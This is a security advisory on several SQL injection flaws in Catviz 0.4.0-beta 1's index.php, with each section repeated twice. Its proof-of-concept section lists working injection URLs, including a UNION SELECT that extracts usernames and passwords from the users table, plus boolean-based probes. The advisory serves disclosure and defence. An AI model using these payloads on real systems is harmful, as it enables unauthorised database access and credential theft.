Catviz 'index.php' Multiple SQL Injection Vulnerabilities
BID:30014
Info
Catviz 'index.php' Multiple SQL Injection Vulnerabilities
| Bugtraq ID: | 30014 |
| Class: | Input Validation Error |
| CVE: |
CVE-2008-3129 |
| Remote: | Yes |
| Local: | No |
| Published: | Jun 30 2008 12:00AM |
| Updated: | May 07 2015 05:27PM |
| Credit: | h0yt3r |
| Vulnerable: |
Catviz Catviz 0.4 -beta 1 |
| Not Vulnerable: | |
Discussion
Catviz 'index.php' Multiple SQL Injection Vulnerabilities
Catviz is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Catviz 0.4.0-beta 1 is vulnerable; other versions may also be affected.
Catviz is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Catviz 0.4.0-beta 1 is vulnerable; other versions may also be affected.
Exploit / POC
Catviz 'index.php' Multiple SQL Injection Vulnerabilities
An attacker can exploit these issues via a browser.
The following proof-of-concept URIs are available:
http://www.example.com/index.php?module=news&news_op=form&form_name=article&form_action=show&foreign_key_value=10 union select 1,2,3,4,5,6,7,8,9,concat(username,0x3a,password),11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32 from mod_users/*
http://www.example.com/index.php?webpages_form=webpage_multi_edit&webpage=26 and%201=1
http://www.example.com/index.php?webpages_form=webpage_multi_edit&webpage=26 and%201=0
An attacker can exploit these issues via a browser.
The following proof-of-concept URIs are available:
http://www.example.com/index.php?module=news&news_op=form&form_name=article&form_action=show&foreign_key_value=10 union select 1,2,3,4,5,6,7,8,9,concat(username,0x3a,password),11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32 from mod_users/*
http://www.example.com/index.php?webpages_form=webpage_multi_edit&webpage=26 and%201=1
http://www.example.com/index.php?webpages_form=webpage_multi_edit&webpage=26 and%201=0
Solution / Fix
Catviz 'index.php' Multiple SQL Injection Vulnerabilities
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].